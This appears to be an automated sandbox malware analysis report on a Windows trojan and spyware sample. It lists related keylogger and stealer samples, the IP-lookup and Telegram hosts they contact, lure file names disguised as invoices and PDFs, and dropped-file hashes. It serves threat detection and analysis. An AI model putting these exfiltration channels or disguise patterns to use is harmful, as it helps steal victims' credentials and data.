                                                                      Original Sample Name:8dbe0f8d14496475bd0c298df8763deab33ec4a0a55880fb0b823586f65bc10a.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 95%
                                                                      • Number of executed functions: 140
                                                                      • Number of non-executed functions: 108
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: ppISxhDcpF.exe
                                                                      TimeTypeDescription
                                                                      14:10:23API Interceptor9832x Sleep call for process: ppISxhDcpF.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      132.226.8.169CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • checkip.dyndns.org/
                                                                      xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • checkip.dyndns.org/
                                                                      3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • checkip.dyndns.org/
                                                                      149.154.167.220m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                              YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          reallyfreegeoip.orgCvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.32.1
                                                                                          m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.16.1
                                                                                          YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.112.1
                                                                                          xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.112.1
                                                                                          AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.64.1
                                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.64.1
                                                                                          api.telegram.orgm0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          checkip.dyndns.comCvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 193.122.6.168
                                                                                          FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 193.122.6.168
                                                                                          jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 132.226.247.73
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          TELEGRAMRUm0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          UTMEMUSCvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 132.226.8.169
                                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 132.226.247.73
                                                                                          3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 132.226.8.169
                                                                                          v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          CLOUDFLARENETUSCvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.32.1
                                                                                          bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                                          • 104.21.7.187
                                                                                          m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          Message 2.emlGet hashmaliciousUnknownBrowse
                                                                                          • 172.64.41.3
                                                                                          FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 104.23.145.230
                                                                                          Message.emlGet hashmaliciousUnknownBrowse
                                                                                          • 1.1.1.1
                                                                                          s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 104.26.12.205
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          54328bd36c14bd82ddaa0c04b25ed9adCvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.96.1
                                                                                          m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.96.1
                                                                                          AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.96.1
                                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.96.1
                                                                                          3b5074b1b5d032e5620f69f9f700ff0em0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          37f463bf4616ecd445d4a1937da06e19m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          g7Mz6hLxqw.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 172.217.23.110
                                                                                          • 142.250.181.225
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dllm0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):253850
                                                                                                              Entropy (8bit):7.814291711551856
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:th5qC8VFwfWGF9gU+SSiuotrbiTK5PAjWK:v5qTwfWGDP/S+iTKxAyK
                                                                                                              MD5:A35A134475F9882F13DE626FD7FDA2E4
                                                                                                              SHA1:FD56DEFCA8227313348EDA3287816ADD12E08EB8
                                                                                                              SHA-256:BBD476BAF2D2BE3CF63487ACE11603B437C317FD6849FB794A8342E0108A5AD8
                                                                                                              SHA-512:80B4A6546629E28AA8B820BAD2E3E0AC57AC84E858ABE25C90735A8CCFE837946A6B3F00B983EB6FBDBCDF11B13822263A2E573F8D51D2DB04DD9BA0E4CCCF23
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:.............888..KKKKKKK.nnn._............................................P...qqqqq.........5....+.................OO....................../.........kk.....................,......VV..............44.3..............AA.yyy....=..............*.......................................h....UUUU.......g........xx...........!!./.[[.....DDDD.........._............r.......**.ZZZZZ..........."...........UU..............I.;;;.LL..................B.............FFF..........t............................FF.P......)........?............ii.;..\\\\..M.......zz........bbb......@.??....P...........R..............................S.......p..222...........................GGG.....GG......Z.........TTTTT.z...WW........g.v.33.p...............ss.....g..............+.....hh........55............._..............l..g.......<..................................||...u......22.....?...............................X...............AA...........h...............K......I.......;;.........xxx.f.................*......X......yy.
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):14599
                                                                                                              Entropy (8bit):4.542958055672668
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:xrZr1+9qMultEuBh8CSs8ywUdBzB60Lct+01sJXiFhyWbSlXia1mtpt:x9r1+mlHP8ywUvc801sJXi2WbSlyASt
                                                                                                              MD5:A246367D6459D338115FB171AE048F4F
                                                                                                              SHA1:095776AA1A6C8E191C2BE7C827FBCF978987BBFB
                                                                                                              SHA-256:6D535560BAF2D8E5098DDC441E70694853BCB3E0A7411916888754B8D2BB27BB
                                                                                                              SHA-512:95F546C51860DC7366D613B739060A65C743784C5FFE3343FDA6421B5D7A227FB741DD64644F39B6686D95B39C2F143A8BA3B50384271A66EB14326D3E3F96B8
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:.*...[......................|.oo......\\\..((........h............y.......UU......LLLLLLLLL..........OOOOOOO..................1.D....]]]].......L..1.(((.i...XXXXX.C.~~..bb.W...||.........j.........:........0000......&...p.....5................DDD......+....ZZZ..BB..........."""..]]..................................''...++.222.........%......................~............|..j..i.................UU.@.................QQQ.Z..lll......||...;...77............._..........N...~.....????.............o..............fffffff......$............nnn..........F.C........................---.$.....W..5.....L........G..........................::.ww......"""............##......HHH....77...............................JJ.J..66...ZZ......................nnn....Z...55...........=..........t......OO.....m...........V.........uuuu..............D...ttt..................."......===....$...L..................G.''..............2................................................r.T..........................?...........
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56641
                                                                                                              Entropy (8bit):1.2318917163845036
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                              MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                              SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                              SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                              SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):345
                                                                                                              Entropy (8bit):4.241929841155785
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                              MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                              SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                              SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                              SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):210366
                                                                                                              Entropy (8bit):1.240975322465592
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                              MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                              SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                              SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                              SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):363811
                                                                                                              Entropy (8bit):1.2512349423386382
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                              MD5:BFEA15C03AB295424981A73637A19491
                                                                                                              SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                              SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                              SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                              Malicious:false
                                                                                                              Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):11776
                                                                                                              Entropy (8bit):5.655335921632966
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                              MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                              SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                              SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                              SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: m0CZ8H4jfl.exe, Detection: malicious, Browse
                                                                                                              • Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: RFQ December-January Forcast and TCL.exe, Detection: malicious, Browse
                                                                                                              • Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1180
                                                                                                              Entropy (8bit):3.2745851786245974
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:8wl0+sXU0v/tz0/CSL6/cBnwgXl341DEDeG41DEDWaBQ1olfW+kjcmAa/BCNfBfZ:8F7WLrFPjPKzizZM/gjqy
                                                                                                              MD5:D6B70B357B892FB3D3B9B0112691FE0B
                                                                                                              SHA1:F20667704C77D947AA23BA7E8596D74B9E18F6ED
                                                                                                              SHA-256:75324C5518652D59C05F7BAE3EE65B92776BAB0E06562AFE1D871AA9E070DDA8
                                                                                                              SHA-512:A80B870F8330406C9E5AE4A9D60523E5FB3E8F46EDA574D06925BE00DA66872CB3BE3C9CD39E596037EED1777D12FE68D23007F9AEC78B93856E796FBF32EB33
                                                                                                              Malicious:false
